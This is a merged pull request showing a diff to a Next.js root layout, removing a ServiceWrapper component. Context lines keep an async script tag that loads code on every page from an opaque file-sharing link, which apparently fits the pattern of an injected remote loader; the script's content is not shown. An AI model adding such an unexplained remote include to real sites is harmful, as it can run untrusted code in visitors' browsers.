Merge version_3 into main #5

Merged
bender merged 1 commits from version_3 into main 2026-03-08 11:22:35 +00:00

View File

@@ -2,7 +2,6 @@ import type { Metadata } from "next";
import { Inter } from "next/font/google";
import "./styles/variables.css";
import "./styles/base.css";
import { ServiceWrapper } from "@/providers/serviceWrapper/ServiceWrapper";
const inter = Inter({
variable: "--font-inter", subsets: ["latin"],
@@ -19,7 +18,7 @@ export default function RootLayout({
return (
<html lang="en" suppressHydrationWarning>
<body className={`${inter.variable} antialiased`}>
<ServiceWrapper>{children}</ServiceWrapper>
{children}
<script
async
src="https://quickshare.samsungcloud.com/vnfM1txMB8k9"